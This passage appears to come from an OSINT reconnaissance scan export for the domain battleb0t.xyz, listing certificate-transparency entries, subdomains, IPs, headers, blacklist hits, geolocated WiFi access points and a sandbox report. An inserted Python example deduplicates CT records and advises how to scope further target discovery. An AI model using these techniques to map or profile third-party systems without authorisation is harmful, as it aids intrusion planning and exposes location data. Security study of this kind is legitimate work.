u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
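The "Internet Name" row above carries a raw crt.sh result list for battleb0t.xyz, and it shows the two things that make Certificate Transparency data awkward to consume directly: every Let's Encrypt serial appears twice (CT logs receive the precertificate and the final certificate as separate entries, a few hundred milliseconds apart), and the list mixes the site's own certificates with CDN-issued ones (a Cloudflare certificate whose CN is sni.cloudflaressl.com but whose SANs are *.battleb0t.xyz and battleb0t.xyz). The following is an added example, not part of the scan export and not SpiderFoot code: it deduplicates such records by serial, extracts the hostnames they reveal under one apex, separates wildcards and names outside the apex, and filters by validity at a chosen time so expired history does not get mistaken for live infrastructure. The sample records are constructed from values in the export above, trimmed to the crt.sh fields the code reads (issuer_ca_id is dropped); they are a sample, not a live query.

```python
"""Deduplicate crt.sh-style CT records and pull the hostnames they reveal.

Added example; not part of the scan export.  SAMPLE_CT is constructed from values
that appear in the export (serials, names, issuers, timestamps, crt.sh ids).
"""
import re
from datetime import datetime


def _rec(serial, cn, names, issuer, not_before, not_after, entry_ts, log_id):
    """Build one crt.sh-shaped record (only the fields this example reads)."""
    return {"serial_number": serial, "common_name": cn, "name_value": names,
            "issuer_name": issuer, "not_before": not_before, "not_after": not_after,
            "entry_timestamp": entry_ts, "id": log_id}


LE = "C=US, O=Let's Encrypt, CN=R3"
GTS = "C=US, O=Google Trust Services LLC, CN=GTS CA 1P5"
CF = 'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3'

# Constructed sample: ten log entries, six distinct certificates.  Each LE serial
# is present twice (precertificate + final certificate), exactly as in the export.
SAMPLE_CT = [
    _rec("0450556de56492a07fd0de032baf77c2fcfe", "nwapi2.battleb0t.xyz", "nwapi2.battleb0t.xyz", LE,
         "2023-05-04T19:22:49", "2023-08-02T19:22:48", "2023-05-04T20:22:50.261", 9313572020),
    _rec("0450556de56492a07fd0de032baf77c2fcfe", "nwapi2.battleb0t.xyz", "nwapi2.battleb0t.xyz", LE,
         "2023-05-04T19:22:49", "2023-08-02T19:22:48", "2023-05-04T20:22:49.987", 9308913897),
    _rec("038dd7e0051838a5db8a4864f2689a9822c8", "battleb0t.xyz", "battleb0t.xyz\nwww.battleb0t.xyz", LE,
         "2023-04-26T02:43:31", "2023-07-25T02:43:30", "2023-04-26T03:43:31.484", 9249459074),
    _rec("038dd7e0051838a5db8a4864f2689a9822c8", "battleb0t.xyz", "battleb0t.xyz\nwww.battleb0t.xyz", LE,
         "2023-04-26T02:43:31", "2023-07-25T02:43:30", "2023-04-26T03:43:31.388", 9234809365),
    _rec("044e821a86ae7d8a393c2524c646dfb3a2f4", "fluid.battleb0t.xyz", "fluid.battleb0t.xyz", LE,
         "2023-04-24T03:43:01", "2023-07-23T03:43:00", "2023-04-24T04:43:01.973", 9235401447),
    _rec("044e821a86ae7d8a393c2524c646dfb3a2f4", "fluid.battleb0t.xyz", "fluid.battleb0t.xyz", LE,
         "2023-04-24T03:43:01", "2023-07-23T03:43:00", "2023-04-24T04:43:01.703", 9220770682),
    _rec("0397995c60ac4068f8b2de0a677adab7d116", "fluid.battleb0t.xyz", "fluid.battleb0t.xyz", LE,
         "2023-02-24T03:02:53", "2023-05-25T03:02:52", "2023-02-24T04:02:53.851", 8798923488),
    _rec("0397995c60ac4068f8b2de0a677adab7d116", "fluid.battleb0t.xyz", "fluid.battleb0t.xyz", LE,
         "2023-02-24T03:02:53", "2023-05-25T03:02:52", "2023-02-24T04:02:53.639", 8726539247),
    _rec("26cc7f01c692257813509e4880751557", "*.battleb0t.xyz", "*.battleb0t.xyz\nbattleb0t.xyz", GTS,
         "2023-03-23T22:37:05", "2023-06-21T22:37:04", "2023-03-23T23:37:05.821", 8969484265),
    _rec("09cccb40358f10167bc737cb947e311a", "sni.cloudflaressl.com", "*.battleb0t.xyz\nbattleb0t.xyz", CF,
         "2023-03-23T00:00:00", "2024-03-21T23:59:59", "2023-03-23T22:34:16.439", 8968494929),
]


def parse_ts(ts):
    """crt.sh timestamps are naive UTC ISO-8601 with a 0-3 digit fraction (the export
    has '...12.05'); pad to microseconds so every datetime.fromisoformat accepts it."""
    head, _, frac = ts.partition(".")
    return datetime.fromisoformat(f"{head}.{frac.ljust(6, '0')}" if frac else head)


def dedupe_by_serial(entries):
    """Collapse precert + final-cert entries for one serial into one record, keeping the
    earliest log timestamp and every crt.sh id so the duplicates stay auditable."""
    merged = {}
    for e in entries:
        key = e["serial_number"].lower()
        if key in merged:
            m = merged[key]
            m["log_ids"].append(e["id"])
            m["entry_timestamp"] = min(m["entry_timestamp"], e["entry_timestamp"], key=parse_ts)
        else:
            merged[key] = dict(e, log_ids=[e["id"]])
    for m in merged.values():
        m["log_ids"].sort()
    return merged


def identities(e):
    """All names a record asserts: the SAN list in name_value plus the CN."""
    return {n.strip().lower() for n in e["name_value"].split("\n") if n.strip()} | {e["common_name"].lower()}


def covers(pattern, hostname):
    """RFC 6125-style match: '*.' stands in for exactly one leftmost label."""
    if pattern == hostname:
        return True
    if pattern.startswith("*."):
        return hostname.endswith(pattern[1:]) and hostname.count(".") == pattern.count(".")
    return False


def names_in(entries, apex):
    """Split every asserted name into concrete names under apex, wildcards, and names
    outside apex (a CN like sni.cloudflaressl.com marks a CDN-issued shared cert)."""
    apex = apex.lower()
    concrete, wildcards, foreign = set(), set(), set()
    for e in entries:
        for name in identities(e):
            if name.startswith("*."):
                wildcards.add(name)
            elif name == apex or name.endswith("." + apex):
                concrete.add(name)
            else:
                foreign.add(name)
    return concrete, wildcards, foreign


def valid_at(entries, when):
    """Certificates whose validity window contains `when` (datetime or ISO string)."""
    when = parse_ts(when) if isinstance(when, str) else when
    return [e for e in entries if parse_ts(e["not_before"]) <= when <= parse_ts(e["not_after"])]


def certs_covering(entries, hostname, include_wildcards=True):
    """Issuance history for one hostname, oldest first; wildcards optional."""
    hostname = hostname.lower()
    hits = [e for e in entries if any(covers(p, hostname) for p in identities(e)
                                      if include_wildcards or not p.startswith("*."))]
    return sorted(hits, key=lambda e: parse_ts(e["not_before"]))


def issuer_cn(issuer_name):
    """CN= of an RDN string such as "C=US, O=Let's Encrypt, CN=R3"."""
    m = re.search(r"CN=([^,]+)", issuer_name)
    return m.group(1).strip() if m else issuer_name


if __name__ == "__main__":
    uniq = list(dedupe_by_serial(SAMPLE_CT).values())
    print(f"{len(SAMPLE_CT)} log entries -> {len(uniq)} distinct certificates")
    concrete, wildcards, foreign = names_in(uniq, "battleb0t.xyz")
    print("hostnames:", sorted(concrete), "| wildcards:", sorted(wildcards), "| outside apex:", sorted(foreign))
    print(f"valid at scan time: {len(valid_at(uniq, '2023-05-12T02:44:30'))}, valid on 2023-06-01: {len(valid_at(uniq, '2023-06-01T00:00:00'))}")
    for e in certs_covering(uniq, "fluid.battleb0t.xyz"):
        print(f"  {e['not_before']}  {e['serial_number']:<36}  {issuer_cn(e['issuer_name'])}")
```

Run it against a real crt.sh JSON response (`https://crt.sh/?q=%25.example.com&output=json` returns the same field names) and the same functions apply unchanged. The split between concrete names, wildcards and names outside the apex matters for scoping: a wildcard from GTS or a Cloudflare shared certificate covers fluid.battleb0t.xyz without telling you the host exists, so only the concrete set should seed further DNS resolution, while the foreign set is a quick signal that the target sits behind a CDN and its origin address is not what the A record returns.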
| 2023-05-12 02:54:20 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | funny.battleb0t.xyz |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | fluid.battleb0t.xyz |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0066cc.github.io | 185.199.111.153 |
| 2023-05-12 02:54:17 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5e062258aa2252-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3037::6815:470e |
| 2023-05-12 02:50:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 3 | 0 | None | Honeypotproject (104.21.71.14): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 104.21.71.14 |
| 2023-05-12 03:00:58 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.97): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | JWNK (Net ID: 00:14:5C:88:0D:74) | 50.8897, 6.0563 |
| 2023-05-12 03:23:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.12:443 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo61714 (Net ID: 00:0C:F6:59:F1:12) | 50.8897, 6.0563 |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 3 | 0 | 3 | 0 | None | http://code.jquery.com/jquery-3.2.1.js | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:46:55 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:cd:b7:3c:d6:71:f3:4f:d0:0b:1c:3a:89:f9:32:41:9b:99
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:22:44 2022 GMT
Not After : Feb 15 13:22:43 2023 GMT
Subject: CN=www.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:bd:87:9d:fd:0d:e7:91:1c:82:de:38:55:01:b8:
01:a4:4f:91:68:f2:b6:41:bd:96:b7:21:f2:a0:55:
3b:8f:fb:94:98:1c:4d:61:0a:0d:49:1e:41:02:01:
75:0f:0f:e7:3e:9d:a4:2e:1d:07:1e:23:ae:57:ed:
a8:d0:66:39:2d:83:68:be:6e:6f:58:41:0a:9a:c5:
3e:12:87:89:8c:60:e5:de:67:7a:e4:46:2e:7b:08:
ed:c2:60:17:80:e6:b4:45:ca:55:4c:b4:aa:5a:0e:
21:b2:65:97:04:7d:42:9a:78:70:55:51:b1:3b:c5:
d3:0d:ce:41:3b:0f:13:16:72:ef:e1:6f:39:c8:fd:
4b:2d:7e:9e:b0:41:fd:9c:7c:61:84:dd:e4:70:a7:
c5:c7:ec:ba:20:9f:a0:1f:9c:1c:14:59:c8:6c:6b:
82:ec:5e:ff:5a:3a:74:2a:f6:b9:fb:b1:ab:97:21:
90:d8:cd:5c:36:36:0e:73:80:7f:e4:4a:7c:cd:5d:
9a:1e:e6:d5:29:40:7a:8c:74:6b:33:02:0d:4e:19:
f0:00:4b:c5:69:8a:06:03:20:76:15:a8:c2:2f:17:
7a:d2:cd:b7:58:14:91:a2:f2:64:cf:8f:82:14:81:
ba:d6:41:8b:94:86:36:f5:f5:da:76:a8:04:5b:ad:
f0:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
57:48:2A:D8:70:70:AC:E4:0A:F6:8C:02:EF:80:5A:28:2D:B1:3C:AE
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
36:fd:c3:ee:77:8a:70:b0:4d:2d:e7:2a:5c:5f:4d:da:b4:a1:
e2:01:81:ed:f5:51:9e:99:02:16:e3:a3:0b:1f:75:93:c8:5e:
b9:d7:f5:17:db:c5:b5:da:58:15:fd:4b:36:d5:4d:d6:5d:2b:
4f:49:fe:17:38:11:d4:b2:eb:07:49:19:e3:43:16:4c:57:7c:
97:e9:db:e2:60:b9:08:77:50:48:9b:b0:17:ef:9d:09:42:2e:
2c:30:28:d5:83:ed:da:76:33:41:0d:5b:41:19:c5:b8:7f:74:
cf:bd:8b:ac:7e:2d:b1:2d:d2:aa:05:f2:50:61:9c:8f:16:2d:
59:13:65:6c:9c:0b:8f:2b:a9:e1:4d:ad:99:3c:ae:24:73:55:
9d:81:3b:f1:9e:69:4c:61:66:fb:26:19:5a:2f:78:df:76:be:
4f:90:40:ce:71:fc:d7:53:04:9e:03:82:87:39:e3:ba:6f:94:
e1:23:1d:69:45:b3:a4:42:55:02:7e:d3:af:be:34:75:9f:16:
a6:29:8b:66:c6:ca:4a:93:de:4b:14:90:c7:14:68:7f:9c:0a:
30:11:89:14:58:e3:55:39:f0:a4:c6:80:42:fc:39:c9:c9:40:
ba:10:84:83:2d:87:52:29:63:ea:37:f2:50:8b:de:a9:ff:9e:
bc:f4:cc:e6
| battleb0t.xyz |
| 2023-05-12 03:34:02 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx<br>A`qRWQ<br>@Qh9'<br>WYW`Q<br>6:E<0s<br>qt2!X<br>O"Np<br>/Z9l6<br>23W4R<br>p$ke'V<br>sZSjUQ<br>S\-up<br>iTb.T<br>IDAT?<br>ZYjy9<br>k-<Z6<br>DRZ1s<br>NLgiN<br>7jI\k<br>q8cH$<br>cG$C:<br>70/1c<br>Zmfdc2<br>FC1Qh<br>IDATU<br>aEPq<aF<br>yPbDap<br>@j518b<br>.!5Cw<br>epCrZ<br>nYy\o<br>F'Tjms<br>s2OUvm<br>wfD/fG<br>o-\kY<br>gGtIx9<br>t?T x<br>`q\41<br>r`qOp<br>/. rqS<br>hTKCz<br>bkV_n<br>aU9zH<br>svPOI<br>LwXr3<br>L?3t1<br>V'DYE<br>78AHzS<br>h7YIvh-<br>Xg:5B<br>jAQY3<br><Eh_-<br>ZJvh1<br>Q`6Vh<br>xk1ao<br>6xyMC<br>YGH2f?<br>PbtsQ<br>vu11h<br>Ip@ \<br>x0Er-<br>ZIuZM<F<br>HDBs!<br>D$r"r"r<br>5e8YW<br>hd@87<br>3\-:9<br>L!sA6z<br>l ?K8'<br>Z\1hp<br>?JWEG5<br>N@1$!EHq<br>4 1Qb<br>IDATae<br>KJ:. -:.<br>XWU:\Us<br>0:HB8<br>0>>7c<br>MU0t5<br>RtVTMT<br>ktCtE<br>T1SffT<br>DoV:LLN<br>Ey8UQ<br>xsqO7<br>DtOJoJ<br>k Q:1<br>RS-.7<br>Ty NW<br>le1NU<br>Qt@tBr<br>3 "B"q<br>B8!u`<br>BGt4:<br>PiZEOK<br>1VuEE<br>V2xqwbH<br>IDAT/v<br>?KwP0TA<br>jO/Ty | https://funny.battleb0t.xyz/images/carti_2.PNG |
| 2023-05-12 03:24:22 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA | https://ayhu.xyz/ |
| 2023-05-12 02:53:41 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url1021.joinpreventor.com/ls/click?upn=bna4-2BmY1ITDZjl0PQKir67uPPI2f2DxWOATqx3-2Fj7OYylB8Hflza-2F4c-2BTJ51THm64bMitYJMpTuBxoVK0JwiPA-3D-3DpyHG_2XvlAmvoAz3TtepUWzZ-2Fg6Vtpb0zElD-2BU8dA0uWhdmvWpUzFQRCBLPcsU5at7iOPzNbZzyRCb5bSh-2BoMMyAUQdyJp9IV2xfegy0-2FMwvEi-2BwozwcLtcNHqHaMRs8zAm7v5oZ8wTMu7PUckSXiY1wEtthrMiHMmlt1SKTk4hf2iioRh3-2B86BVSrTZJJ2g6sue3eW6I57lqbc2bcdpC-2Bp22gAow8TiD5sSYFOCPPeJl4SEjho6CtTHi1SkbZeCNjuDVaCHb7ZN7pl7M8J4fMd6cYgTzAMer0zWo7ptC-2FaDcdGyQ5alZBCdDDYj-2BhHCJI3n5O7QbBOTHbEW4BPzmKn4frv1-2FDXuZomKHcSKPoCB6HeEWrY9Qr5sgHr-2BneuGSXpzCfRF8yt-2FeaaoqJDE-2B2ngu0d2quGV2vB4dMuXQiRsmUpk-3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b60_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b60_IESQMMUTEX_0_331"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2912"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b60_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n 
"IsoScope_b60_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_b60_IE_EarlyTabStart_0xa2c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b60_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.120:80"\n "52.25.204.60:443"\n "13.227.74.22:443"\n "142.250.191.74:443"\n "18.205.222.128:443"\n "185.199.109.153:443"\n "13.227.21.217:443"\n "142.250.191.42:443"\n "13.227.74.93:443"\n "157.240.22.25:443"\n "136.143.191.67:443"\n "142.250.189.163:443"\n "13.227.74.48:443"\n "91.199.212.52:80"\n "204.141.43.48:443"\n "136.143.191.144:443"\n "136.143.190.97:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url1021.joinpreventor.com"\n "crt.usertrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "connect.facebook.net"\n "crt.usertrust.com"\n "css.zohocdn.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "js.zohocdn.com"\n "maciejsawicki.com"\n "preventor.com"\n "salesiq.zoho.com"\n "salesiq.zohopublic.com"\n "script.hotjar.com"\n "static.hotjar.com"\n 
"uploads-ssl.webflow.com"\n "url1021.joinpreventor.com"\n "vts.zohopublic.com"\n "www.bugherd.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"src="https://www.facebook.com/tr?id=2116198561850213&ev=PageView" (Indicator: "facebook.com"), "</style><meta name="twitter:card" content="summary" />" (Indicator: "twitter"), "<meta name="twitter:site" content="@Preventorft" />" (Indicator: "twitter"), "{state:0\ntransportUrl:b\ncontext:c\nparent:Wk()}\nP(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ja+"&cx=c";Tr()&&(f+="&sign="+Jh.Xe);var g=Sh||ci?Sr(b,f):void 0;g||(g=Fo("https://","http://",Jh.ze+f));Qk().destination[a]={state:1\ncontext:c\nparent:Wk()};mc(g)}};function Ur(){if(Ok()){return!0}return!1};var Xr=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/)\nYr={cl:["ecl"]\ncustomPixels:["nonGooglePixels"]\necl:["cl"]\nehl:["hl"]\nhl:["ehl"]\nhtml:["customScripts"\n"customPixels"\n"nonGooglePixels"\n"nonGoogleScripts"\n"nonGoogleIframes"]\ncustomScripts:["html"\n"customPixels"\n"nonGooglePixels"\n"nonGoogleScripts"\n"nonGoogleIframes"]\nnonGooglePixels:[]\nnonGoogleScripts:["nonGooglePixels"]\nnonGoogleIframes:["nonGooglePixels"]}\nZr={cl:["ecl"]\ncustomPixels:["customScripts"\n"html"]\n" (Indicator: "youtube"), "var Jv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0\nf=0;return{createEvent:function(g,h,m){var n=a()\np=n.Lg\nq=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Lg*h):Math.round(n.Pi)\nr=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100)\nt=G.hidden?!1:.5<=Pi(c);d();var u=void 0;void 0!==b&&(u=[b]);var 
v=lv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube"), "b\n"vert.pix");break;case "PERCENT":qy(d.verticalThresholds,b,"vert.pct")}pv("sdl","init",!1)?pv("sdl","pending",!1)||I(function(){return ry()}):(nv("sdl","init",!0)\nnv("sdl","pending",!0)\nI(function(){ry();if(sy()){var e=ty();qc(z,"scroll",e);qc(z,"resize",e)}else nv("sdl","init",!1)}));return b}xy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"])\nyy=["www.youtube.com"\n"www.youtube-nocookie.com"]\nzy\nAy=!1;" (Indicator: "youtube"), "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gg:d\nEg:e\nFg:f\nlh:g\nmh:h\nWd:m\nib:b}\np=z.YT\nq=function(){Gy(n)};if(p)return p.ready&&p.ready(q)\nb;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=G.getElementsByTagName("script")\nu=t.length\nv=0;v<u;v++){var w=t[v].getAttribute("src");if(Jy(w,"iframe_api")||Jy(w,"player_api"))return b}for(var x=G.getElementsByTagName("iframe")\ny=x.length\nA=0;A<y;A++)if(!Ay&&Hy(x[A],n.Wd))return mc("https://www.youtube.com/iframe_api")\n" (Indicator: "youtube"), "Ay=!0\nb});return b}Ky.N="internal.enableAutoEventOnYouTubeActivity";var Ly;function My(a){var b=!1;return b}My.N="internal.evaluateMatchingRules";" (Indicator: "youtube"), "GET /5f774172772fc1fb1fa10c12/5f774173a2f6f80a3d80d3be_twitter.png HTTP/1.1Accept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip\n deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "twitter"), "GET /5f774172772fc1fb1fa10c12/606cb3a9126777b98ff68805_icon-youtube.png HTTP/1.1Accept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5Referer: 
https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip\n deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2FA0.tmp" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, 